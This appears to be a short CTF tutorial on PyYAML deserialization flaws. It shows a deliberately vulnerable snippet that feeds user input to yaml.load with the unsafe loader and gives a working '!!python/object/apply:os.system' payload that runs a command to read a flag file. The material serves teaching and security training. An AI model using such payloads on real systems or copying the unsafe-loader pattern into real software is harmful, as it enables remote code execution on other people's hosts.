CTF Support

YAML Deserialization

Introduction

YAML deserialization vulnerabilities occur when a Python application passes untrusted input to PyYAML's yaml.load() with an unsafe Loader (yaml.Loader, yaml.UnsafeLoader, or, on older PyYAML versions, no Loader argument at all). Those loaders honour Python-specific tags such as !!python/object/apply, so PyYAML will instantiate arbitrary Python objects from the document, which leads to remote code execution (RCE). In web CTFs, this weakness often hides in uploaded YAML configuration files or in YAML-encoded request payloads.


Quick Reference

Task                  Code / Payload
--------------------  -------------------------------------------------
Vulnerable call       yaml.load(user_input, Loader=yaml.Loader)
Detect vulnerability  Search for yaml.load( in source code
Exploit template      Use !!python/object/apply: payloads

Example: Vulnerable Application

import yaml

def parse_config(data):
    # yaml.Loader is the full, unsafe loader: it resolves !!python/* tags
    # and will construct arbitrary objects from attacker-controlled YAML.
    return yaml.load(data, Loader=yaml.Loader)

# Untrusted input flows straight into the unsafe loader.
user_yaml = input("Enter YAML: ")
parse_config(user_yaml)

Exploitation Example

To trigger code execution, you can invoke OS commands using Python’s os.system via PyYAML’s apply syntax.

!!python/object/apply:os.system ["cat flag.txt"]

When deserialized, this executes the command on the host.